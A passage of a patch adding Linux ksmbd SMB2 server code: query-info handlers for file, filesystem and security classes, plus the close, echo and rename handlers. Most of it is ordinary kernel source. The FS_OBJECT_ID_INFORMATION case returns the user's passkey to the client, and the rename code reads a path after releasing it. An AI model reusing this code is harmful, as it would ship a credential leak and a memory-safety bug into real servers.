++	file_info->CompressedFileSize = cpu_to_le64(stat.blocks << 9);
++	file_info->CompressionFormat = COMPRESSION_FORMAT_NONE;
++	file_info->CompressionUnitShift = 0;
++	file_info->ChunkShift = 0;
++	file_info->ClusterShift = 0;
++	memset(&file_info->Reserved[0], 0, 3);
++
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_comp_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_comp_info));
++}
++
++static int get_file_attribute_tag_info(struct smb2_query_info_rsp *rsp,
++				       struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_attr_tag_info *file_info;
++
++	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
++		pr_err("no right to read the attributes : 0x%x\n",
++		       fp->daccess);
++		return -EACCES;
++	}
++
++	file_info = (struct smb2_file_attr_tag_info *)rsp->Buffer;
++	file_info->FileAttributes = fp->f_ci->m_fattr;
++	file_info->ReparseTag = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_attr_tag_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_attr_tag_info));
++	return 0;
++}
++
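++/*
++ * Fill the SMB3.1.1 POSIX query info response from the inode,
++ * followed by two 16-byte UNIX SIDs (owner and group) derived from
++ * the inode's uid/gid.
++ */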
++static int find_file_posix_info(struct smb2_query_info_rsp *rsp,
++				struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb311_posix_qinfo *file_info;
++	struct inode *inode = file_inode(fp->filp);
++	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
++	vfsuid_t vfsuid = i_uid_into_vfsuid(user_ns, inode);
++	vfsgid_t vfsgid = i_gid_into_vfsgid(user_ns, inode);
++	u64 time;
++	int out_buf_len = sizeof(struct smb311_posix_qinfo) + 32;
++
++	file_info = (struct smb311_posix_qinfo *)rsp->Buffer;
++	file_info->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(inode->i_atime);
++	file_info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(inode->i_mtime);
++	file_info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(inode->i_ctime);
++	file_info->ChangeTime = cpu_to_le64(time);
++	file_info->DosAttributes = fp->f_ci->m_fattr;
++	file_info->Inode = cpu_to_le64(inode->i_ino);
++	file_info->EndOfFile = cpu_to_le64(inode->i_size);
++	file_info->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
++	file_info->HardLinks = cpu_to_le32(inode->i_nlink);
++	file_info->Mode = cpu_to_le32(inode->i_mode & 0777);
++	file_info->DeviceId = cpu_to_le32(inode->i_rdev);
++
++	/*
++	 * Sids(32) contains two SIDs (UNIX user sid(16), UNIX group sid(16)).
++	 * UNIX sid(16) = revision(1) + num_subauth(1) + authority(6) +
++	 *		  sub_auth(4 * 1(num_subauth)) + RID(4).
++	 */
++	id_to_sid(from_kuid_munged(&init_user_ns, vfsuid_into_kuid(vfsuid)),
++		  SIDUNIX_USER, (struct smb_sid *)&file_info->Sids[0]);
++	id_to_sid(from_kgid_munged(&init_user_ns, vfsgid_into_kgid(vfsgid)),
++		  SIDUNIX_GROUP, (struct smb_sid *)&file_info->Sids[16]);
++
++	rsp->OutputBufferLength = cpu_to_le32(out_buf_len);
++	inc_rfc1001_len(rsp_org, out_buf_len);
++	return out_buf_len;
++}
++
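++/*
++ * Dispatch an SMB2_O_INFO_FILE query to the handler for the requested
++ * FileInfoClass and validate the result against the client's output
++ * buffer length.
++ */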
++static int smb2_get_info_file(struct ksmbd_work *work,
++			      struct smb2_query_info_req *req,
++			      struct smb2_query_info_rsp *rsp)
++{
++	struct ksmbd_file *fp;
++	int fileinfoclass = 0;
++	int rc = 0;
++	int file_infoclass_size;
++	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_PIPE)) {
++		/* smb2 info file called for pipe */
++		return smb2_get_info_file_pipe(work->sess, req, rsp,
++					       work->response_buf);
++	}
++
++	if (work->next_smb2_rcv_hdr_off) {
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++				    work->compound_fid);
++			id = work->compound_fid;
++			pid = work->compound_pfid;
++		}
++	}
++
++	if (!has_file_id(id)) {
++		id = req->VolatileFileId;
++		pid = req->PersistentFileId;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, id, pid);
++	if (!fp)
++		return -ENOENT;
++
++	fileinfoclass = req->FileInfoClass;
++
++	switch (fileinfoclass) {
++	case FILE_ACCESS_INFORMATION:
++		get_file_access_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_ACCESS_INFORMATION_SIZE;
++		break;
++
++	case FILE_BASIC_INFORMATION:
++		rc = get_file_basic_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_BASIC_INFORMATION_SIZE;
++		break;
++
++	case FILE_STANDARD_INFORMATION:
++		get_file_standard_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_STANDARD_INFORMATION_SIZE;
++		break;
++
++	case FILE_ALIGNMENT_INFORMATION:
++		get_file_alignment_info(rsp, work->response_buf);
++		file_infoclass_size = FILE_ALIGNMENT_INFORMATION_SIZE;
++		break;
++
++	case FILE_ALL_INFORMATION:
++		rc = get_file_all_info(work, rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_ALL_INFORMATION_SIZE;
++		break;
++
++	case FILE_ALTERNATE_NAME_INFORMATION:
++		get_file_alternate_info(work, rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_ALTERNATE_NAME_INFORMATION_SIZE;
++		break;
++
++	case FILE_STREAM_INFORMATION:
++		get_file_stream_info(work, rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_STREAM_INFORMATION_SIZE;
++		break;
++
++	case FILE_INTERNAL_INFORMATION:
++		get_file_internal_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_INTERNAL_INFORMATION_SIZE;
++		break;
++
++	case FILE_NETWORK_OPEN_INFORMATION:
++		rc = get_file_network_open_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_NETWORK_OPEN_INFORMATION_SIZE;
++		break;
++
++	case FILE_EA_INFORMATION:
++		get_file_ea_info(rsp, work->response_buf);
++		file_infoclass_size = FILE_EA_INFORMATION_SIZE;
++		break;
++
++	case FILE_FULL_EA_INFORMATION:
++		rc = smb2_get_ea(work, fp, req, rsp, work->response_buf);
++		file_infoclass_size = FILE_FULL_EA_INFORMATION_SIZE;
++		break;
++
++	case FILE_POSITION_INFORMATION:
++		get_file_position_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_POSITION_INFORMATION_SIZE;
++		break;
++
++	case FILE_MODE_INFORMATION:
++		get_file_mode_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_MODE_INFORMATION_SIZE;
++		break;
++
++	case FILE_COMPRESSION_INFORMATION:
++		get_file_compression_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_COMPRESSION_INFORMATION_SIZE;
++		break;
++
++	case FILE_ATTRIBUTE_TAG_INFORMATION:
++		rc = get_file_attribute_tag_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_ATTRIBUTE_TAG_INFORMATION_SIZE;
++		break;
++	case SMB_FIND_FILE_POSIX_INFO:
++		if (!work->tcon->posix_extensions) {
++			pr_err("client doesn't negotiate with SMB3.1.1 POSIX Extensions\n");
++			rc = -EOPNOTSUPP;
++		} else {
++			file_infoclass_size = find_file_posix_info(rsp, fp,
++					work->response_buf);
++		}
++		break;
++	default:
++		ksmbd_debug(SMB, "fileinfoclass %d not supported yet\n",
++			    fileinfoclass);
++		rc = -EOPNOTSUPP;
++	}
++	if (!rc)
++		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
++				      rsp, work->response_buf,
++				      file_infoclass_size);
++	ksmbd_fd_put(work, fp);
++	return rc;
++}
++
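++/*
++ * Handle an SMB2_O_INFO_FILESYSTEM query: stat the share root and
++ * build the response for the requested filesystem info class.
++ */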
++static int smb2_get_info_filesystem(struct ksmbd_work *work,
++				    struct smb2_query_info_req *req,
++				    struct smb2_query_info_rsp *rsp)
++{
++	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_share_config *share = work->tcon->share_conf;
++	int fsinfoclass = 0;
++	struct kstatfs stfs;
++	struct path path;
++	int rc = 0, len;
++	int fs_infoclass_size = 0;
++
++	if (!share->path)
++		return -EIO;
++
++	rc = kern_path(share->path, LOOKUP_NO_SYMLINKS, &path);
++	if (rc) {
++		pr_err("cannot create vfs path\n");
++		return -EIO;
++	}
++
++	rc = vfs_statfs(&path, &stfs);
++	if (rc) {
++		pr_err("cannot do stat of path %s\n", share->path);
++		path_put(&path);
++		return -EIO;
++	}
++
++	fsinfoclass = req->FileInfoClass;
++
++	switch (fsinfoclass) {
++	case FS_DEVICE_INFORMATION:
++	{
++		struct filesystem_device_info *info;
++
++		info = (struct filesystem_device_info *)rsp->Buffer;
++
++		info->DeviceType = cpu_to_le32(stfs.f_type);
++		info->DeviceCharacteristics = cpu_to_le32(0x00000020);
++		rsp->OutputBufferLength = cpu_to_le32(8);
++		inc_rfc1001_len(work->response_buf, 8);
++		fs_infoclass_size = FS_DEVICE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_ATTRIBUTE_INFORMATION:
++	{
++		struct filesystem_attribute_info *info;
++		size_t sz;
++
++		info = (struct filesystem_attribute_info *)rsp->Buffer;
++		info->Attributes = cpu_to_le32(FILE_SUPPORTS_OBJECT_IDS |
++					       FILE_PERSISTENT_ACLS |
++					       FILE_UNICODE_ON_DISK |
++					       FILE_CASE_PRESERVED_NAMES |
++					       FILE_CASE_SENSITIVE_SEARCH |
++					       FILE_SUPPORTS_BLOCK_REFCOUNTING);
++
++		info->Attributes |= cpu_to_le32(server_conf.share_fake_fscaps);
++
++		if (test_share_config_flag(work->tcon->share_conf,
++		    KSMBD_SHARE_FLAG_STREAMS))
++			info->Attributes |= cpu_to_le32(FILE_NAMED_STREAMS);
++
++		info->MaxPathNameComponentLength = cpu_to_le32(stfs.f_namelen);
++		len = smbConvertToUTF16((__le16 *)info->FileSystemName,
++					"NTFS", PATH_MAX, conn->local_nls, 0);
++		len = len * 2;
++		info->FileSystemNameLen = cpu_to_le32(len);
++		sz = sizeof(struct filesystem_attribute_info) - 2 + len;
++		rsp->OutputBufferLength = cpu_to_le32(sz);
++		inc_rfc1001_len(work->response_buf, sz);
++		fs_infoclass_size = FS_ATTRIBUTE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_VOLUME_INFORMATION:
++	{
++		struct filesystem_vol_info *info;
++		size_t sz;
++		unsigned int serial_crc = 0;
++
++		info = (struct filesystem_vol_info *)(rsp->Buffer);
++		info->VolumeCreationTime = 0;
++		serial_crc = crc32_le(serial_crc, share->name,
++				      strlen(share->name));
++		serial_crc = crc32_le(serial_crc, share->path,
++				      strlen(share->path));
++		serial_crc = crc32_le(serial_crc, ksmbd_netbios_name(),
++				      strlen(ksmbd_netbios_name()));
++		/* use a dummy value for the serial number */
++		info->SerialNumber = cpu_to_le32(serial_crc);
++		len = smbConvertToUTF16((__le16 *)info->VolumeLabel,
++					share->name, PATH_MAX,
++					conn->local_nls, 0);
++		len = len * 2;
++		info->VolumeLabelSize = cpu_to_le32(len);
++		info->Reserved = 0;
++		sz = sizeof(struct filesystem_vol_info) - 2 + len;
++		rsp->OutputBufferLength = cpu_to_le32(sz);
++		inc_rfc1001_len(work->response_buf, sz);
++		fs_infoclass_size = FS_VOLUME_INFORMATION_SIZE;
++		break;
++	}
++	case FS_SIZE_INFORMATION:
++	{
++		struct filesystem_info *info;
++
++		info = (struct filesystem_info *)(rsp->Buffer);
++		info->TotalAllocationUnits = cpu_to_le64(stfs.f_blocks);
++		info->FreeAllocationUnits = cpu_to_le64(stfs.f_bfree);
++		info->SectorsPerAllocationUnit = cpu_to_le32(1);
++		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
++		rsp->OutputBufferLength = cpu_to_le32(24);
++		inc_rfc1001_len(work->response_buf, 24);
++		fs_infoclass_size = FS_SIZE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_FULL_SIZE_INFORMATION:
++	{
++		struct smb2_fs_full_size_info *info;
++
++		info = (struct smb2_fs_full_size_info *)(rsp->Buffer);
++		info->TotalAllocationUnits = cpu_to_le64(stfs.f_blocks);
++		info->CallerAvailableAllocationUnits =
++					cpu_to_le64(stfs.f_bavail);
++		info->ActualAvailableAllocationUnits =
++					cpu_to_le64(stfs.f_bfree);
++		info->SectorsPerAllocationUnit = cpu_to_le32(1);
++		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
++		rsp->OutputBufferLength = cpu_to_le32(32);
++		inc_rfc1001_len(work->response_buf, 32);
++		fs_infoclass_size = FS_FULL_SIZE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_OBJECT_ID_INFORMATION:
++	{
++		struct object_id_info *info;
++
++		info = (struct object_id_info *)(rsp->Buffer);
++
++		if (!user_guest(sess->user))
++			memcpy(info->objid, user_passkey(sess->user), 16);
++		else
++			memset(info->objid, 0, 16);
++
++		info->extended_info.magic = cpu_to_le32(EXTENDED_INFO_MAGIC);
++		info->extended_info.version = cpu_to_le32(1);
++		info->extended_info.release = cpu_to_le32(1);
++		info->extended_info.rel_date = 0;
++		memcpy(info->extended_info.version_string, "1.1.0", strlen("1.1.0"));
++		rsp->OutputBufferLength = cpu_to_le32(64);
++		inc_rfc1001_len(work->response_buf, 64);
++		fs_infoclass_size = FS_OBJECT_ID_INFORMATION_SIZE;
++		break;
++	}
++	case FS_SECTOR_SIZE_INFORMATION:
++	{
++		struct smb3_fs_ss_info *info;
++		unsigned int sector_size =
++			min_t(unsigned int, path.mnt->mnt_sb->s_blocksize, 4096);
++
++		info = (struct smb3_fs_ss_info *)(rsp->Buffer);
++
++		info->LogicalBytesPerSector = cpu_to_le32(sector_size);
++		info->PhysicalBytesPerSectorForAtomicity =
++				cpu_to_le32(sector_size);
++		info->PhysicalBytesPerSectorForPerf = cpu_to_le32(sector_size);
++		info->FSEffPhysicalBytesPerSectorForAtomicity =
++				cpu_to_le32(sector_size);
++		info->Flags = cpu_to_le32(SSINFO_FLAGS_ALIGNED_DEVICE |
++				    SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE);
++		info->ByteOffsetForSectorAlignment = 0;
++		info->ByteOffsetForPartitionAlignment = 0;
++		rsp->OutputBufferLength = cpu_to_le32(28);
++		inc_rfc1001_len(work->response_buf, 28);
++		fs_infoclass_size = FS_SECTOR_SIZE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_CONTROL_INFORMATION:
++	{
++		/*
++		 * TODO: The current implementation is based on test
++		 * results against a Windows 7 (NTFS) server. It needs
++		 * to be modified to get valid quota values from the
++		 * Linux kernel.
++		 */
++		struct smb2_fs_control_info *info;
++
++		info = (struct smb2_fs_control_info *)(rsp->Buffer);
++		info->FreeSpaceStartFiltering = 0;
++		info->FreeSpaceThreshold = 0;
++		info->FreeSpaceStopFiltering = 0;
++		info->DefaultQuotaThreshold = cpu_to_le64(SMB2_NO_FID);
++		info->DefaultQuotaLimit = cpu_to_le64(SMB2_NO_FID);
++		info->Padding = 0;
++		rsp->OutputBufferLength = cpu_to_le32(48);
++		inc_rfc1001_len(work->response_buf, 48);
++		fs_infoclass_size = FS_CONTROL_INFORMATION_SIZE;
++		break;
++	}
++	case FS_POSIX_INFORMATION:
++	{
++		struct filesystem_posix_info *info;
++
++		if (!work->tcon->posix_extensions) {
++			pr_err("client doesn't negotiate with SMB3.1.1 POSIX Extensions\n");
++			rc = -EOPNOTSUPP;
++		} else {
++			info = (struct filesystem_posix_info *)(rsp->Buffer);
++			info->OptimalTransferSize = cpu_to_le32(stfs.f_bsize);
++			info->BlockSize = cpu_to_le32(stfs.f_bsize);
++			info->TotalBlocks = cpu_to_le64(stfs.f_blocks);
++			info->BlocksAvail = cpu_to_le64(stfs.f_bfree);
++			info->UserBlocksAvail = cpu_to_le64(stfs.f_bavail);
++			info->TotalFileNodes = cpu_to_le64(stfs.f_files);
++			info->FreeFileNodes = cpu_to_le64(stfs.f_ffree);
++			rsp->OutputBufferLength = cpu_to_le32(56);
++			inc_rfc1001_len(work->response_buf, 56);
++			fs_infoclass_size = FS_POSIX_INFORMATION_SIZE;
++		}
++		break;
++	}
++	default:
++		path_put(&path);
++		return -EOPNOTSUPP;
++	}
++	rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
++			      rsp, work->response_buf,
++			      fs_infoclass_size);
++	path_put(&path);
++	return rc;
++}
++
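++/*
++ * Handle an SMB2_O_INFO_SECURITY query: build a security descriptor
++ * from the file's attributes, using an ACL stored in an xattr when
++ * the share keeps one.
++ */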
++static int smb2_get_info_sec(struct ksmbd_work *work,
++			     struct smb2_query_info_req *req,
++			     struct smb2_query_info_rsp *rsp)
++{
++	struct ksmbd_file *fp;
++	struct user_namespace *user_ns;
++	struct smb_ntsd *pntsd = (struct smb_ntsd *)rsp->Buffer, *ppntsd = NULL;
++	struct smb_fattr fattr = {{0}};
++	struct inode *inode;
++	__u32 secdesclen = 0;
++	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
++	int addition_info = le32_to_cpu(req->AdditionalInformation);
++	int rc = 0, ppntsd_size = 0;
++
++	if (addition_info & ~(OWNER_SECINFO | GROUP_SECINFO | DACL_SECINFO |
++			      PROTECTED_DACL_SECINFO |
++			      UNPROTECTED_DACL_SECINFO)) {
++		ksmbd_debug(SMB, "Unsupported addition info: 0x%x)\n",
++		       addition_info);
++
++		pntsd->revision = cpu_to_le16(1);
++		pntsd->type = cpu_to_le16(SELF_RELATIVE | DACL_PROTECTED);
++		pntsd->osidoffset = 0;
++		pntsd->gsidoffset = 0;
++		pntsd->sacloffset = 0;
++		pntsd->dacloffset = 0;
++
++		secdesclen = sizeof(struct smb_ntsd);
++		rsp->OutputBufferLength = cpu_to_le32(secdesclen);
++		inc_rfc1001_len(work->response_buf, secdesclen);
++
++		return 0;
++	}
++
++	if (work->next_smb2_rcv_hdr_off) {
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++				    work->compound_fid);
++			id = work->compound_fid;
++			pid = work->compound_pfid;
++		}
++	}
++
++	if (!has_file_id(id)) {
++		id = req->VolatileFileId;
++		pid = req->PersistentFileId;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, id, pid);
++	if (!fp)
++		return -ENOENT;
++
++	user_ns = file_mnt_user_ns(fp->filp);
++	inode = file_inode(fp->filp);
++	ksmbd_acls_fattr(&fattr, user_ns, inode);
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_ACL_XATTR))
++		ppntsd_size = ksmbd_vfs_get_sd_xattr(work->conn, user_ns,
++						     fp->filp->f_path.dentry,
++						     &ppntsd);
++
++	/* Check if sd buffer size exceeds response buffer size */
++	if (smb2_resp_buf_len(work, 8) > ppntsd_size)
++		rc = build_sec_desc(user_ns, pntsd, ppntsd, ppntsd_size,
++				    addition_info, &secdesclen, &fattr);
++	posix_acl_release(fattr.cf_acls);
++	posix_acl_release(fattr.cf_dacls);
++	kfree(ppntsd);
++	ksmbd_fd_put(work, fp);
++	if (rc)
++		return rc;
++
++	rsp->OutputBufferLength = cpu_to_le32(secdesclen);
++	inc_rfc1001_len(work->response_buf, secdesclen);
++	return 0;
++}
++
++/**
++ * smb2_query_info() - handler for smb2 query info command
++ * @work:	smb work containing query info request buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_query_info(struct ksmbd_work *work)
++{
++	struct smb2_query_info_req *req;
++	struct smb2_query_info_rsp *rsp;
++	int rc = 0;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	ksmbd_debug(SMB, "GOT query info request\n");
++
++	switch (req->InfoType) {
++	case SMB2_O_INFO_FILE:
++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
++		rc = smb2_get_info_file(work, req, rsp);
++		break;
++	case SMB2_O_INFO_FILESYSTEM:
++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILESYSTEM\n");
++		rc = smb2_get_info_filesystem(work, req, rsp);
++		break;
++	case SMB2_O_INFO_SECURITY:
++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_SECURITY\n");
++		rc = smb2_get_info_sec(work, req, rsp);
++		break;
++	default:
++		ksmbd_debug(SMB, "InfoType %d not supported yet\n",
++			    req->InfoType);
++		rc = -EOPNOTSUPP;
++	}
++
++	if (rc < 0) {
++		if (rc == -EACCES)
++			rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		else if (rc == -ENOENT)
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++		else if (rc == -EIO)
++			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++		else if (rc == -EOPNOTSUPP || rsp->hdr.Status == 0)
++			rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
++		smb2_set_err_rsp(work);
++
++		ksmbd_debug(SMB, "error while processing smb2 query rc = %d\n",
++			    rc);
++		return rc;
++	}
++	rsp->StructureSize = cpu_to_le16(9);
++	rsp->OutputBufferOffset = cpu_to_le16(72);
++	inc_rfc1001_len(work->response_buf, 8);
++	return 0;
++}
++
++/**
++ * smb2_close_pipe() - handler for closing IPC pipe
++ * @work:	smb work containing close request buffer
++ *
++ * Return:	0
++ */
++static noinline int smb2_close_pipe(struct ksmbd_work *work)
++{
++	u64 id;
++	struct smb2_close_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_close_rsp *rsp = smb2_get_msg(work->response_buf);
++
++	id = req->VolatileFileId;
++	ksmbd_session_rpc_close(work->sess, id);
++
++	rsp->StructureSize = cpu_to_le16(60);
++	rsp->Flags = 0;
++	rsp->Reserved = 0;
++	rsp->CreationTime = 0;
++	rsp->LastAccessTime = 0;
++	rsp->LastWriteTime = 0;
++	rsp->ChangeTime = 0;
++	rsp->AllocationSize = 0;
++	rsp->EndOfFile = 0;
++	rsp->Attributes = 0;
++	inc_rfc1001_len(work->response_buf, 60);
++	return 0;
++}
++
++/**
++ * smb2_close() - handler for smb2 close file command
++ * @work:	smb work containing close request buffer
++ *
++ * Return:	0
++ */
++int smb2_close(struct ksmbd_work *work)
++{
++	u64 volatile_id = KSMBD_NO_FID;
++	u64 sess_id;
++	struct smb2_close_req *req;
++	struct smb2_close_rsp *rsp;
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_file *fp;
++	struct inode *inode;
++	u64 time;
++	int err = 0;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC pipe close request\n");
++		return smb2_close_pipe(work);
++	}
++
++	sess_id = le64_to_cpu(req->hdr.SessionId);
++	if (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)
++		sess_id = work->compound_sid;
++
++	work->compound_sid = 0;
++	if (check_session_id(conn, sess_id)) {
++		work->compound_sid = sess_id;
++	} else {
++		rsp->hdr.Status = STATUS_USER_SESSION_DELETED;
++		if (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		err = -EBADF;
++		goto out;
++	}
++
++	if (work->next_smb2_rcv_hdr_off &&
++	    !has_file_id(req->VolatileFileId)) {
++		if (!has_file_id(work->compound_fid)) {
++			/* file already closed, return FILE_CLOSED */
++			ksmbd_debug(SMB, "file already closed\n");
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++			err = -EBADF;
++			goto out;
++		} else {
++			ksmbd_debug(SMB,
++				    "Compound request set FID = %llu:%llu\n",
++				    work->compound_fid,
++				    work->compound_pfid);
++			volatile_id = work->compound_fid;
++
++			/* file closed, stored id is not valid anymore */
++			work->compound_fid = KSMBD_NO_FID;
++			work->compound_pfid = KSMBD_NO_FID;
++		}
++	} else {
++		volatile_id = req->VolatileFileId;
++	}
++	ksmbd_debug(SMB, "volatile_id = %llu\n", volatile_id);
++
++	rsp->StructureSize = cpu_to_le16(60);
++	rsp->Reserved = 0;
++
++	if (req->Flags == SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB) {
++		fp = ksmbd_lookup_fd_fast(work, volatile_id);
++		if (!fp) {
++			err = -ENOENT;
++			goto out;
++		}
++
++		inode = file_inode(fp->filp);
++		rsp->Flags = SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB;
++		rsp->AllocationSize = S_ISDIR(inode->i_mode) ? 0 :
++			cpu_to_le64(inode->i_blocks << 9);
++		rsp->EndOfFile = cpu_to_le64(inode->i_size);
++		rsp->Attributes = fp->f_ci->m_fattr;
++		rsp->CreationTime = cpu_to_le64(fp->create_time);
++		time = ksmbd_UnixTimeToNT(inode->i_atime);
++		rsp->LastAccessTime = cpu_to_le64(time);
++		time = ksmbd_UnixTimeToNT(inode->i_mtime);
++		rsp->LastWriteTime = cpu_to_le64(time);
++		time = ksmbd_UnixTimeToNT(inode->i_ctime);
++		rsp->ChangeTime = cpu_to_le64(time);
++		ksmbd_fd_put(work, fp);
++	} else {
++		rsp->Flags = 0;
++		rsp->AllocationSize = 0;
++		rsp->EndOfFile = 0;
++		rsp->Attributes = 0;
++		rsp->CreationTime = 0;
++		rsp->LastAccessTime = 0;
++		rsp->LastWriteTime = 0;
++		rsp->ChangeTime = 0;
++	}
++
++	err = ksmbd_close_fd(work, volatile_id);
++out:
++	if (err) {
++		if (rsp->hdr.Status == 0)
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++		smb2_set_err_rsp(work);
++	} else {
++		inc_rfc1001_len(work->response_buf, 60);
++	}
++
++	return 0;
++}
++
++/**
++ * smb2_echo() - handler for smb2 echo(ping) command
++ * @work:	smb work containing echo request buffer
++ *
++ * Return:	0
++ */
++int smb2_echo(struct ksmbd_work *work)
++{
++	struct smb2_echo_rsp *rsp = smb2_get_msg(work->response_buf);
++
++	rsp->StructureSize = cpu_to_le16(4);
++	rsp->Reserved = 0;
++	inc_rfc1001_len(work->response_buf, 4);
++	return 0;
++}
++
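++/*
++ * Handle FILE_RENAME_INFORMATION: a new name containing ':' is
++ * treated as a stream rename and stored as an xattr stream name;
++ * otherwise the file is renamed on the filesystem, honoring
++ * ReplaceIfExists.
++ */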
++static int smb2_rename(struct ksmbd_work *work,
++		       struct ksmbd_file *fp,
++		       struct user_namespace *user_ns,
++		       struct smb2_file_rename_info *file_info,
++		       struct nls_table *local_nls)
++{
++	struct ksmbd_share_config *share = fp->tcon->share_conf;
++	char *new_name = NULL, *abs_oldname = NULL, *old_name = NULL;
++	char *pathname = NULL;
++	struct path path;
++	bool file_present = true;
++	int rc;
++
++	ksmbd_debug(SMB, "setting FILE_RENAME_INFO\n");
++	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
++	if (!pathname)
++		return -ENOMEM;
++
++	abs_oldname = file_path(fp->filp, pathname, PATH_MAX);
++	if (IS_ERR(abs_oldname)) {
++		rc = -EINVAL;
++		goto out;
++	}
++	old_name = strrchr(abs_oldname, '/');
++	if (old_name && old_name[1] != '\0') {
++		old_name++;
++	} else {
++		ksmbd_debug(SMB, "can't get last component in path %s\n",
++			    abs_oldname);
++		rc = -ENOENT;
++		goto out;
++	}
++
++	new_name = smb2_get_name(file_info->FileName,
++				 le32_to_cpu(file_info->FileNameLength),
++				 local_nls);
++	if (IS_ERR(new_name)) {
++		rc = PTR_ERR(new_name);
++		goto out;
++	}
++
++	if (strchr(new_name, ':')) {
++		int s_type;
++		char *xattr_stream_name, *stream_name = NULL;
++		size_t xattr_stream_size;
++		int len;
++
++		rc = parse_stream_name(new_name, &stream_name, &s_type);
++		if (rc < 0)
++			goto out;
++
++		len = strlen(new_name);
++		if (len > 0 && new_name[len - 1] != '/') {
++			pr_err("not allow base filename in rename\n");
++			rc = -ESHARE;
++			goto out;
++		}
++
++		rc = ksmbd_vfs_xattr_stream_name(stream_name,
++						 &xattr_stream_name,
++						 &xattr_stream_size,
++						 s_type);
++		if (rc)
++			goto out;
++
++		rc = ksmbd_vfs_setxattr(user_ns,
++					fp->filp->f_path.dentry,
++					xattr_stream_name,
++					NULL, 0, 0);
++		if (rc < 0) {
++			pr_err("failed to store stream name in xattr: %d\n",
++			       rc);
++			rc = -EINVAL;
++			goto out;
++		}
++
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "new name %s\n", new_name);
++	rc = ksmbd_vfs_kern_path(work, new_name, LOOKUP_NO_SYMLINKS, &path, 1);
++	if (rc) {
++		if (rc != -ENOENT)
++			goto out;
++		file_present = false;
++	} else {
++		path_put(&path);
++	}
++
++	if (ksmbd_share_veto_filename(share, new_name)) {
++		rc = -ENOENT;
++		ksmbd_debug(SMB, "Can't rename vetoed file: %s\n", new_name);
++		goto out;
++	}
++
++	if (file_info->ReplaceIfExists) {
++		if (file_present) {
++			rc = ksmbd_vfs_remove_file(work, new_name);
++			if (rc) {
++				if (rc != -ENOTEMPTY)
++					rc = -EINVAL;
++				ksmbd_debug(SMB, "cannot delete %s, rc %d\n",
++					    new_name, rc);
++				goto out;
++			}
++		}
++	} else {
++		if (file_present &&
++		    strncmp(old_name, path.dentry->d_name.name, strlen(old_name))) {
++			rc = -EEXIST;
++			ksmbd_debug(SMB,
++				    "cannot rename already existing file\n");
++			goto out;
++		}
++	}
++
++	rc = ksmbd_vfs_fp_rename(work, fp, new_name);
++out:
++	kfree(pathname);
